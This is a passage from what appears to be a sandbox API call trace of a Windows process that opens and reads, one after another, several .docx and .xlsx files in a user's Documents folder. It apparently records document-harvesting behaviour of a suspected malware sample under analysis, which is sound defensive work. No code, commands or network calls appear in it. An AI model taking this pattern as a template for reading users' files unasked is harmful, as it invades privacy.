lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.257] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.257] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.257] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.258] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.258] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.258] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.258] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.259] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x4af, lpOverlapped=0x0) returned 1 [0217.259] ReadFile (in: hFile=0x354, lpBuffer=0x265fbe3, nNumberOfBytesToRead=0x351, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x265fbe3*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.259] ReadFile (in: hFile=0x354, lpBuffer=0x26607a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26607a0*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.261] CloseHandle (hObject=0x354) returned 1 [0217.262] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0217.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), fInfoLevelId=0x0, lpFileInformation=0x2690a10 | out: lpFileInformation=0x2690a10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc)) returned 1 [0217.262] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.262] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0217.262] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0217.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc)) returned 1 [0217.263] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.263] GetFileType (hFile=0x354) returned 0x1 [0217.264] GetFileType (hFile=0x354) returned 0x1 [0217.264] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.264] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.265] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.265] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.266] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.266] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.266] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.266] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.267] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.267] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.268] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.268] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0xbcc, lpOverlapped=0x0) returned 1 [0217.268] ReadFile (in: hFile=0x354, lpBuffer=0x26913f0, nNumberOfBytesToRead=0x34, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26913f0*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.268] ReadFile (in: hFile=0x354, lpBuffer=0x2691c90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2691c90*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.269] CloseHandle (hObject=0x354) returned 1 [0217.270] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0217.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), fInfoLevelId=0x0, lpFileInformation=0x26b62ac | out: lpFileInformation=0x26b62ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7)) returned 1 [0217.318] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.318] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0217.318] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0217.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7)) returned 1 [0217.319] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.319] GetFileType (hFile=0x354) returned 0x1 [0217.319] GetFileType (hFile=0x354) returned 0x1 [0217.320] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.320] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.320] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.321] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.321] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.322] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.322] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.322] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.323] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.323] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.323] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.323] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.324] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.324] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.324] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.325] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.325] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.325] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.326] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.326] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.326] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.327] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.327] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.327] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0xbf7, lpOverlapped=0x0) returned 1 [0217.328] ReadFile (in: hFile=0x354, lpBuffer=0x26b6d6b, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b6d6b*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.328] ReadFile (in: hFile=0x354, lpBuffer=0x26b75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26b75e0*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.331] CloseHandle (hObject=0x354) returned 1 [0217.331] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0217.331] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), fInfoLevelId=0x0, lpFileInformation=0x26eb704 | out: lpFileInformation=0x26eb704*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8)) returned 1 [0217.331] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.331] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0217.331] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0217.332] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8)) returned 1 [0217.332] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.333] GetFileType (hFile=0x354) returned 0x1 [0217.333] GetFileType (hFile=0x354) returned 0x1 [0217.333] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.333] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.334] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.334] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.335] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.335] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.335] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.336] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x9d8, lpOverlapped=0x0) returned 1 [0217.336] ReadFile (in: hFile=0x354, lpBuffer=0x26ebf30, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ebf30*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.336] ReadFile (in: hFile=0x354, lpBuffer=0x26ec9c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x26ec9c4*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.337] CloseHandle (hObject=0x354) returned 1 [0217.337] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", lpFilePart=0x0) returned 0x27 [0217.337] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gzn4l.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2714464 | out: lpFileInformation=0x2714464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7549ad20, ftCreationTime.dwHighDateTime=0x1d79938, ftLastAccessTime.dwLowDateTime=0x6ad49ed0, ftLastAccessTime.dwHighDateTime=0x1d7e335, ftLastWriteTime.dwLowDateTime=0x6ad49ed0, ftLastWriteTime.dwHighDateTime=0x1d7e335, nFileSizeHigh=0x0, nFileSizeLow=0x160ba)) returned 1 [0217.337] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.338] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", lpFilePart=0x0) returned 0x27 [0217.338] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx", lpFilePart=0x0) returned 0x27 [0217.338] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gzn4l.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7549ad20, ftCreationTime.dwHighDateTime=0x1d79938, ftLastAccessTime.dwLowDateTime=0x6ad49ed0, 